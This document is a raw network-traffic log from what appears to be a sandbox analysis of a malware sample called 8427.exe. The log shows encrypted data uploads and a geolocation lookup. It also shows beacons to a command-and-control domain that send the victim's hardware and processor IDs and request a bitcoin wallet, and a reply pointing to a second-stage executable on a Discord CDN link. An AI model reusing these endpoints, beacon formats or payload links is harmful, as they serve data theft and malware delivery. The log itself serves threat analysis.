2023-11-18 09:02:48 UTC	10444	OUT	Data Raw: 9d cf 9c b6 12 82 06 20 7f 64 6e 6d 12 df f6 24 28 73 89 ff 58 96 00 7c 6b fc 75 a5 ff f8 03 16 d9 0b ef 20 00 a7 2e 1e b9 74 3e b6 94 97 ba cd ff 29 f9 0c dc e4 07 df 15 49 7a c6 f6 9c fc 22 98 50 de 99 e4 60 ab bc 8a d9 c6 0e fc 99 96 98 ee 90 2a d5 9f 5e e6 73 c8 5e e2 8d 57 aa bb 4e 45 d2 0f 8f af 59 1f 45 0d 71 99 2a 6e 99 1b 97 1a 87 4d 57 f2 f5 cd 2b 0a 6e 40 6a 1e ae 33 07 67 27 c5 20 45 ba b9 9f bd fd 8b 65 d9 56 d8 41 ad 09 e7 f4 86 18 dc 0f 64 fc 5e a3 58 e6 8c bc 29 d7 38 24 68 dd de 63 b9 de 78 84 ba 34 69 42 00 b6 6c 87 e3 f4 42 19 4f 45 1a 17 84 7e e9 60 60 c1 ac 7a b7 76 ae af b7 6a df 44 55 c6 c2 d9 cd 84 aa 37 ef 65 27 27 80 3e 93 62 11 e9 41 0a 01 54 d9 29 20 72 13 61 16 15 11 96 fa 92 93 33 27 d9 32 d2 05 ea b4 a2 20 1a 24 87 38 e8 ff Data Ascii: dnm$(sX\|ku .t>)Iz"P`^s^WNEYEqnMW+n@j3g' EeVAd^X)8$hcx4iBlBOE~``zvjDU7e''>bAT) ra3'2 $8
2023-11-18 09:02:48 UTC	10452	OUT	Data Raw: 2d 35 fb ee 9e bd 9d 27 9c df ef 63 e7 7d 25 65 67 18 d7 ca 30 e0 3e 47 45 3b f9 69 05 73 5b d2 91 2a d8 39 cc 29 22 77 24 0b b7 2d e0 e6 88 68 e8 e5 ab 57 19 2b 57 69 bf 13 07 8c 46 8d 79 28 b5 42 0c 7e 3d cb 36 2c 97 d5 ea c3 19 6b bb 50 c5 2c 87 f7 e8 f6 9f 79 c5 46 6f af d3 29 06 28 89 21 2f 6e e2 92 65 f1 cb 3b 04 40 71 8f 66 f8 8e 8c 65 fd 8a a5 22 67 e5 e8 f0 5d 6d 4b 17 ed b2 72 f3 f4 3b 3d 06 31 c1 47 c9 11 a2 10 c3 5f b4 65 f1 26 ac 0d 76 9b 19 b7 ad d2 0b 35 de 74 04 8b 04 d8 35 6c e6 d9 f8 f1 62 20 a3 e7 a3 04 94 b0 69 f1 97 9d be 96 b2 5e 9f fb 28 d3 c9 b2 d3 d4 f7 70 52 a5 21 83 b5 64 64 91 61 b7 b0 31 80 09 a6 fe a2 c1 fe 78 72 2d 51 7e 67 49 a7 32 7a e1 0a 42 c2 c5 b1 61 b3 24 63 9b 7d 42 8f 3e 16 b6 37 5e 91 64 53 11 9a 55 60 fd 9b 95 a7 Data Ascii: -5'c}%eg0>GE;is[*9)"w$-hW+WiFy(B~=6,kP,yFo)(!/ne;@qfe"g]mKr;=1G_e&v5t5lb i^(pR!dda1xr-Q~gI2zBa$c}B>7^dSU`
2023-11-18 09:02:48 UTC	10460	OUT	Data Raw: 4d 6a b7 c0 71 cb d5 cb b4 c0 e3 fd e8 65 8e 1b ab 08 dc 39 b4 d1 da 68 15 f3 e3 76 bf 53 70 00 bd 83 81 96 c1 9e 80 ab ff 31 73 db 49 73 8d ca 49 c6 84 e0 47 61 30 04 ea da e3 a4 cb 71 9d 3a 81 fc 42 a6 1b 36 0c 9e 09 1a 9d 19 19 df c2 3f 6e 56 e0 0c 2e d7 2d bd 38 e6 b6 ea b5 9d e0 81 4f 97 ea 77 f7 91 a9 b8 fb 1f 73 d6 3e f0 bf 7e 09 ee cf 2a 93 16 09 7a 53 a7 44 b8 c4 c4 20 ce 20 33 06 fd ae 73 90 a0 48 d4 6d 62 be fa df 8c 2e 78 80 08 e7 ae a3 2e 5d 1b 77 34 5c ee 8e 07 6e 1c a4 a4 e1 81 3f f7 73 e6 53 16 ad f1 80 e7 7e 6f f8 d7 46 84 6d 58 66 94 04 4c e9 5c 06 49 24 88 26 34 48 51 8e 67 de 51 74 f0 b9 a8 77 b0 23 0c 6f 2b cb 40 1b 10 b2 69 5f 3f 2e 08 a9 a7 c2 cc 3f ae 0d c4 41 db b1 b3 31 af 2c 7e 4d 45 d3 87 30 5c d4 42 18 ea df ea e0 b3 97 8a 4e Data Ascii: Mjqe9hvSp1sIsIGa0q:B6?nV.-8Ows>~*zSD 3sHmb.x.]w4\n?sS~oFmXfL\I$&4HQgQtw#o+@i_?.?A1,~ME0\BN
2023-11-18 09:02:48 UTC	10468	OUT	Data Raw: cf 26 b8 25 4a 23 54 f8 b3 42 f1 dd 58 ac ed c3 3f 34 54 c7 9a ea 76 19 aa 47 e1 70 3d 62 16 16 a9 15 4d 95 7a 79 69 1b 8a af db 5b 66 c3 b6 8f 3f 31 46 77 d5 f6 6f 84 3c e9 77 1d 1e e0 51 fa 5c e5 7f 69 c5 4d 07 a6 ae 83 f2 54 4a d0 4b 8c bb 9d 4c 70 ce 8c fe 4f 3f 12 d1 69 6f ee 49 03 66 14 da 1d 9c b9 a2 c7 ff d6 f2 42 ce 7d 23 34 d5 fe cb c9 78 52 17 93 76 22 6a 7e e6 b4 51 98 84 90 ac bf 30 fc 8f f6 38 21 e1 7f 2c a7 0b ce dc 53 42 64 da de 13 ee c7 f1 63 a6 32 7a 82 79 60 49 3d 13 8d 85 0d c4 9f 23 21 b4 02 a8 b8 73 4c ca 34 1e 93 6a 5b 86 c1 4f 7d 97 d3 b2 d9 c0 93 0e cb 60 97 87 95 89 26 78 a0 c1 60 ef e2 57 46 79 e7 f1 90 d3 17 73 79 6b 1f 8a de 50 67 83 0e 10 9c 84 90 35 d6 ee 41 1d 6b 60 51 fa 00 ce c7 c4 6d 61 f0 26 b1 48 ff 37 28 72 5e da d4 Data Ascii: &%J#TBX?4TvGp=bMzyi[f?1Fwo<wQ\iMTJKLpO?ioIfB}#4xRv"j~Q08!,SBdc2zy`I=#!sL4j[O}`&x`WFysykPg5Ak`Qma&H7(r^
2023-11-18 09:02:48 UTC	10476	OUT	Data Raw: da de d8 30 70 26 46 1a a7 d1 41 79 02 fe ac 55 d7 26 6d 5e f5 3c 0d c7 2c 46 23 3d b5 9b b9 c1 92 79 52 ed 23 fc d1 4c 72 42 dc c7 15 6d 5d 66 1b e7 33 fb 2e 34 42 5a 70 4e e6 59 ed b5 cd 4c 2a fe 50 44 37 f2 f7 1e ac f9 14 7b 1a 2c 2b 46 ed 37 5e ba c7 39 0b 13 3a 75 04 33 f4 ab 33 cd bd 60 41 ea bd 67 58 dc 25 8b 1b f1 a1 b5 da ee 05 c5 db 4a 17 f3 3e 6c 05 da 28 b2 f0 dd 20 56 4e 4c ae 8f a8 d0 94 be 2e e0 b8 38 95 b2 9d 3d dc 78 53 2e d5 47 dc 4d d7 44 af a3 61 cd 89 51 d3 4f 6f 7c 09 f6 bb 92 04 f9 14 4d 94 31 b7 ec 81 2f 1a 70 fa 8f 55 0f 9e 77 1b 1a fe f6 fb 86 62 46 c0 cc 8b 8f 5b ba bf 1d 74 25 93 a6 08 83 3e bd b5 3d b6 e1 92 58 61 dd 97 39 a7 35 2f d6 cd 97 3a c4 c1 b1 59 98 1d e9 59 60 5e e3 29 74 74 8c 11 67 21 52 88 25 bd 2b 95 f6 5a 29 b2 Data Ascii: 0p&FAyU&m^<,F#=yR#LrBm]f3.4BZpNYL*PD7{,+F7^9:u33`AgX%J>l( VNL.8=xS.GMDaQOo\|M1/pUwbF[t%>=Xa95/:YY`^)ttg!R%+Z)
2023-11-18 09:02:48 UTC	10484	OUT	Data Raw: 23 c0 be 43 84 fa 92 20 f4 92 3f 4a 27 d5 ba 2e 67 61 ce 33 c7 2b 18 51 a3 3f 39 ba ef 6c ba ef d3 b9 96 bf 55 9d 7b 1d 7c a6 dd fc c4 d8 3c 52 f9 56 d3 9b 82 7b ba 25 46 a6 49 72 fb 22 45 fd e2 e7 ca 2b cc 9f fd e1 d3 39 25 27 a4 74 62 78 de 36 c3 83 4b 48 c9 ef c2 09 b7 1c 57 1f d5 cb e3 6f e2 c2 6d 3b 64 13 0c 46 f7 69 2e bb a0 dc 26 ea aa ee 09 5e ef a9 79 cf 16 85 23 3e 55 18 01 ec 8b 2c f0 dd af d2 f9 09 da 56 0d 7b e1 a0 36 01 bf d4 de fd 9b 39 9c a6 06 68 1f c0 c4 fd 34 92 68 d4 15 93 2a a2 c9 d8 4c d9 4e 65 84 86 ca 4d d9 27 37 58 ab f2 91 83 ff 99 4a 7d b4 8b 5e 82 da b6 a7 da 1f 36 c2 57 bd 27 c7 50 4f be f0 5f f3 54 58 3e f7 f6 67 17 a3 92 26 93 85 b7 df 40 4f da 3d 4e 0c 9b cf e2 8b b2 53 b1 4b de 45 d1 3c bd da d5 35 06 e7 3a 74 6a 63 ae 1a Data Ascii: #C ?J'.ga3+Q?9lU{\|<RV{%FIr"E+9%'tbx6KHWom;dFi.&^y#>U,V{69h4h*LNeM'7XJ}^6W'PO_TX>g&@O=NSKE<5:tjc
2023-11-18 09:02:48 UTC	10492	OUT	Data Raw: 2d 22 92 22 f9 7e 68 45 38 e5 44 ef ca 64 98 bb c6 9e 27 2e 1b 99 ba e4 bd 91 af 73 cd cf be 85 a8 9f 57 76 5c 4a 2b 74 6c e9 b1 93 b6 60 ef 17 f5 ae 4f 24 02 29 61 8d 43 ef 61 b4 20 f4 99 89 31 e1 fd a0 0a 7d ce 6f cf f5 9c fa 6e dc cf 8a 7f 9c 05 18 18 fe 09 84 f6 ff 13 83 70 72 b6 62 4e 54 4c 30 02 0f c6 29 76 0d 73 30 ef f5 9e 24 3d c5 9c 05 b9 d7 a1 41 62 4b 28 9f 06 62 9e b5 38 7a 20 27 fe 16 7d 8c 9e ba b6 7e 59 88 20 25 3e 8c 0e 87 49 e0 f7 f3 3b e9 60 11 43 25 7b 81 3c 0a 7a d3 87 ca 1a ad 07 fe 0a 28 c0 9c c7 68 dd f2 c4 eb a3 64 b6 8a d1 12 39 98 b0 c5 65 4e 7a b2 9e d8 b2 18 9f 1c b6 3c df 5b f4 61 4c 79 92 13 ab 2d 8b 46 d4 25 3b 6b f5 7e 23 9f 32 5a 6f c3 8b f2 17 c7 10 25 0f 22 24 c2 38 d8 32 61 b4 e6 77 d3 0d c7 31 15 8c f8 58 64 59 57 c5 Data Ascii: -""~hE8Dd'.sWv\J+tl`O$)aCa 1}onprbNTL0)vs0$=AbK(b8z '}~Y %>I;`C%{<z(hd9eNz<[aLy-F%;k~#2Zo%"$82aw1XdYW
2023-11-18 09:02:48 UTC	10500	OUT	Data Raw: 4c 59 77 5d 57 b6 7a c9 20 3c 54 68 d1 e3 3d ad 36 72 78 6a 32 9a ef ab 6e 95 f0 8b e4 a3 46 9a 54 b7 b9 dc 2f 8c d1 b2 1b 5f 18 64 18 8a 4c 5d ee de 52 64 8c 1e fd 1a 31 42 a9 67 e3 63 c3 ec af da c7 91 b9 d1 e8 42 65 fd 2d 22 21 a6 0c 87 f4 32 36 49 a5 94 fb 64 c8 7a f2 20 93 aa b8 9d 48 7e a0 9c 5b 56 c0 e7 62 f2 50 68 54 3e b7 34 6d 10 23 c9 0f 33 23 11 89 89 65 e2 49 fe ee cb ad bd 32 6f e0 c3 43 b8 1d 25 5c 69 d5 5d 63 83 5d 75 c3 78 3c bd 73 48 aa bc ac 45 d2 05 31 92 23 81 37 5a 35 52 1c 42 9a 30 26 66 3e 5b 13 17 3c 67 15 f1 61 17 cf ea c0 4b 20 07 5d c9 b4 a0 ed f7 17 5d ad 61 70 b9 52 78 a0 32 af 0e a5 9c 04 cd 9d 49 cf 92 8d e8 08 62 06 98 8a 5c 75 c2 2a ee 8c 0b 69 76 0f 22 81 19 7c bd 61 fe 9e ef cf e4 dd 6c c3 d1 c5 2d f6 21 c4 77 9a f5 d0 Data Ascii: LYw]Wz <Th=6rxj2nFT/_dL]Rd1BgcBe-"!26Idz H~[VbPhT>4m#3#eI2oC%\i]c]ux<sHE1#7Z5RB0&f>[<gaK ]]apRx2Ib\u*iv"\|al-!w
2023-11-18 09:02:48 UTC	10502	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 65 38 64 37 38 39 35 36 62 33 34 37 2d 2d 0d 0a Data Ascii: -----------------------8dbe8d78956b347--
2023-11-18 09:02:49 UTC	10502	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k1W6019MXhhZvqJ3tdo9oqvkT0ZuRBiWmbmdcMd4%2FjwZK%2B7wpI9Q%2BeiaZKx6rVgYelm54DMIShGIzAS8bOWM6L%2FyEhDy8PsQSnfJ6aoe2ym%2FLGrvEqMus3pGrVg4L1MCuv%2Fb%2Fq2q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f095efe23c4ca-SEA alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49765	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:49 UTC	10502	OUT	GET //ferr.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:50 UTC	10503	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PeIbx0AwemzIvKXxNwnEjYmShe3c0lPO6g5RA%2BGBIY%2Fu9Gqe7VippyYXyz52FvLmPEmba2mqExEtw5CY7%2BjoQiRQxQl%2F%2B5fIkDztwN16cAXqvW7J6tDbpA35NyB7USL7JkMmmTeF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f096a0edbc399-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:50 UTC	10503	IN	Data Raw: 32 0d 0a 4e 4f 0d 0a Data Ascii: 2NO
2023-11-18 09:02:50 UTC	10503	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	104.21.89.193	443	192.168.2.4	49765	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:49 UTC	10502	OUT	GET //ferr.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:50 UTC	10503	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PeIbx0AwemzIvKXxNwnEjYmShe3c0lPO6g5RA%2BGBIY%2Fu9Gqe7VippyYXyz52FvLmPEmba2mqExEtw5CY7%2BjoQiRQxQl%2F%2B5fIkDztwN16cAXqvW7J6tDbpA35NyB7USL7JkMmmTeF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f096a0edbc399-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:50 UTC	10503	IN	Data Raw: 32 0d 0a 4e 4f 0d 0a Data Ascii: 2NO
2023-11-18 09:02:50 UTC	10503	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	147.135.36.89	443	192.168.2.4	49767	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:50 UTC	10503	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:02:51 UTC	10503	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:51 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2023-11-18 09:02:51 UTC	10503	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49767	147.135.36.89	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:50 UTC	10503	OUT	GET /?output=xml HTTP/1.1 Host: ipwho.is Connection: Keep-Alive
2023-11-18 09:02:51 UTC	10503	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:51 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close Server: ipwhois Access-Control-Allow-Headers: * X-Robots-Tag: noindex
2023-11-18 09:02:51 UTC	10503	IN	Data Raw: 33 61 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 3c 69 70 3e 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 3c 2f 69 70 3e 3c 73 75 63 63 65 73 73 3e 31 3c 2f 73 75 63 63 65 73 73 3e 3c 74 79 70 65 3e 49 50 76 34 3c 2f 74 79 70 65 3e 3c 63 6f 6e 74 69 6e 65 6e 74 3e 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 3c 2f 63 6f 6e 74 69 6e 65 6e 74 3e 3c 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 4e 41 3c 2f 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 3e 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 3c 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 5f 63 6f 64 65 3e 3c 72 65 67 69 6f 6e 3e 57 61 Data Ascii: 3a3<?xml version="1.0" encoding="UTF-8"?><query><ip>156.146.49.168</ip><success>1</success><type>IPv4</type><continent>North America</continent><continent_code>NA</continent_code><country>United States</country><country_code>US</country_code><region>Wa

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49769	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:52 UTC	10504	OUT	GET /getwallet.php?id=1444&wallet=btc HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:52 UTC	10505	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DvbAR3q%2B4iZ1uPx2wpzhi2jmcBYLfIZzhukij31yJtYsuIyeQeiKCJienq2zp%2F4m3X4GhQm3YI8c3QYXleS65r4sEgIwyQFT5a26%2FhR6D8o7Tkezq2Aiseu%2FY%2FjwcPvlI%2FPYEaR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09795efcc4d4-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:52 UTC	10506	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	104.21.89.193	443	192.168.2.4	49769	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:52 UTC	10504	OUT	GET /getwallet.php?id=1444&wallet=btc HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:52 UTC	10505	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DvbAR3q%2B4iZ1uPx2wpzhi2jmcBYLfIZzhukij31yJtYsuIyeQeiKCJienq2zp%2F4m3X4GhQm3YI8c3QYXleS65r4sEgIwyQFT5a26%2FhR6D8o7Tkezq2Aiseu%2FY%2FjwcPvlI%2FPYEaR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09795efcc4d4-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:52 UTC	10506	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49770	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:52 UTC	10504	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:52 UTC	10505	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2B4Hb6x%2B1DrlnqNZLT4lUqhSIQtGVhdudeevrAPICcZ7Osbm4SIc4PmtE3TzFilGRkbZma9xukotHonRs8Z8YyYilKLQnt0CEtHXX1E5NhxzN%2Fe4nO5LLsqeVHII0DS2Zw5WnQO9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0979684eebcb-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:52 UTC	10505	IN	Data Raw: 37 0d 0a 53 55 43 43 45 53 53 0d 0a Data Ascii: 7SUCCESS
2023-11-18 09:02:52 UTC	10505	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	104.21.89.193	443	192.168.2.4	49770	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:52 UTC	10504	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:02:52 UTC	10505	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2B4Hb6x%2B1DrlnqNZLT4lUqhSIQtGVhdudeevrAPICcZ7Osbm4SIc4PmtE3TzFilGRkbZma9xukotHonRs8Z8YyYilKLQnt0CEtHXX1E5NhxzN%2Fe4nO5LLsqeVHII0DS2Zw5WnQO9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0979684eebcb-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:52 UTC	10505	IN	Data Raw: 37 0d 0a 53 55 43 43 45 53 53 0d 0a Data Ascii: 7SUCCESS
2023-11-18 09:02:52 UTC	10505	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49771	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:53 UTC	10506	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:53 UTC	10506	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4aEdJ%2Bz%2B1bt9wAoWSpUF03sm7Gdt7zH4tp1ihZE8hlUCJhe6kjdozPiOETiYH8LjCeazqLo6ovSFWX2%2B5wBMnUDOyDe%2FjST3nGaZSpuOVUyfSQiGmLYHS%2FCODr2Z%2B5owLwCyMHTU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f097ffb01ec0f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	104.21.89.193	443	192.168.2.4	49771	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:53 UTC	10506	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:53 UTC	10506	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4aEdJ%2Bz%2B1bt9wAoWSpUF03sm7Gdt7zH4tp1ihZE8hlUCJhe6kjdozPiOETiYH8LjCeazqLo6ovSFWX2%2B5wBMnUDOyDe%2FjST3nGaZSpuOVUyfSQiGmLYHS%2FCODr2Z%2B5owLwCyMHTU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f097ffb01ec0f-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:02:53 UTC	10507	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	104.21.89.193	443	192.168.2.4	49772	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
